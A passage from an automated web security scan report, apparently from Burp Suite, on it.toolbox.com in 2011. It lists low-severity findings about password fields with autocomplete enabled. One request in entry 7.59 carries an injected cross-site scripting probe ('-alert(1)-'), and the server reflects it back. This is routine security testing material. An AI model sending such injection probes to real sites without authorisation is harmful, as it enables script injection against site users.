...[SNIP]...

7.46. http://it.toolbox.com/blogs/ppmtoday/the-wocket-in-your-pocket-42008  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/the-wocket-in-your-pocket-42008

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/the-wocket-in-your-pocket-42008 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 69404
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   The Wocket
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/the-wocket-in-your-pocket-42008" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.47. http://it.toolbox.com/blogs/ppmtoday/two-old-pals-41071  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/two-old-pals-41071

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/two-old-pals-41071 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68626
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:33 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Two Old Pal
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/two-old-pals-41071" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.48. http://it.toolbox.com/blogs/ppmtoday/venture-and-gender-43847  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/venture-and-gender-43847

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/venture-and-gender-43847 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 66046
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:44:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Venture and
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/venture-and-gender-43847" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.49. http://it.toolbox.com/blogs/ppmtoday/why-should-i-change-40067  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/why-should-i-change-40067

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/ppmtoday/why-should-i-change-40067 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 81197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Why Should
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/ppmtoday/why-should-i-change-40067" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.50. http://it.toolbox.com/blogs/start  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/start

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /blogs/start HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51361
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Start a new
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/blogs/start" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.51. http://it.toolbox.com/communities/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /communities/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /communities/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48463
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/communities/" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'm_m_tabContainer_rptTabContents_ctl00_btnSearch_btnCTA')" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.52. http://it.toolbox.com/companies/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /companies/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /companies/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62657
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Toolbox for
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/companies/default.aspx" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$ctl00$m$txtSignin_Password" type="password" id="ctl00_ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.53. http://it.toolbox.com/companies/white-papers/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /companies/white-papers/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /companies/white-papers/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86960
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   White Paper
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/companies/white-papers/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.54. http://it.toolbox.com/groups/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /groups/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /groups/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Groups

...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/groups/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.55. http://it.toolbox.com/home/recover-password  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/recover-password

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /home/recover-password HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25307
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Recover My
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/recover-password" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.56. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/register HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38997
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/register" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top">
                   <input name="m$m$r$s$txtPassword" type="password" id="m_m_r_s_txtPassword" class="textbox310" tabindex="1005" />
               </td>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.57. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/register?trksubprod=ctajoin HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39114
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/register?trksubprod=ctajoin" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top">
                   <input name="m$m$r$s$txtPassword" type="password" id="m_m_r_s_txtPassword" class="textbox310" tabindex="1005" />
               </td>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.58. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39625
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/register?trksubprod=joinnow_stationary&amp;opi_t=Future+States&amp;opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top">
                   <input name="m$m$r$s$txtPassword" type="password" id="m_m_r_s_txtPassword" class="textbox310" tabindex="1005" />
               </td>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.59. http://it.toolbox.com/home/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/register?trksubprod=joinnow_stationary&opi_t=Future+States&opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&opi_o=5 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39817
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: joinedfrom=title=Future States&url=http://it.toolbox.com/blogs/ppmtoday?306f2'-alert(1)-'2382eb5920b=1&origin=5; domain=.toolbox.com; expires=Wed, 09-Feb-2011 14:47:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Register wi
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/register?trksubprod=joinnow_stationary&amp;opi_t=Future+States&amp;opi_u=http%3a%2f%2fit.toolbox.com%2fblogs%2fppmtoday%3f306f2'-alert(1)-'2382eb5920b%3d1&amp;opi_o=5" id="aspnetForm">
<div>
...[SNIP]...
<td valign="top">
                   <input name="m$m$r$s$txtPassword" type="password" id="m_m_r_s_txtPassword" class="textbox310" tabindex="1005" />
               </td>
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.60. http://it.toolbox.com/home/search/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/search/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /home/search/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37016
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   IT Communit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/search/" id="aspnetForm">
<div>
...[SNIP]...
<div><input name="ctl00$m$txtSignin_Password" type="password" id="ctl00_m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.61. http://it.toolbox.com/home/signin  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /home/signin

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /home/signin HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25134
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Sign In
</
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/home/signin" id="aspnetForm">
<div>
...[SNIP]...
<div class="spacer">
<input name="m$m$password" type="password" id="m_m_password" class="textboxmediumsmall floatright" defaultButton="m_m_submit1_btnCTA" />
<span class="size12 anthracite">
...[SNIP]...
<div><input name="m$txtSignin_Password" type="password" id="m_txtSignin_Password" tabindex="901" class="signin-textbox" defaultButton="&lt;% =btnSignIn.ClientID %>" /></div>
...[SNIP]...

7.62. http://it.toolbox.com/jobs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jobs/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40888
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Jobs
</tit
...[SNIP]...
</div>
<form name="aspnetForm" method="post" action="/jobs/" id="aspnetForm">
<div>
...[SNIP]...
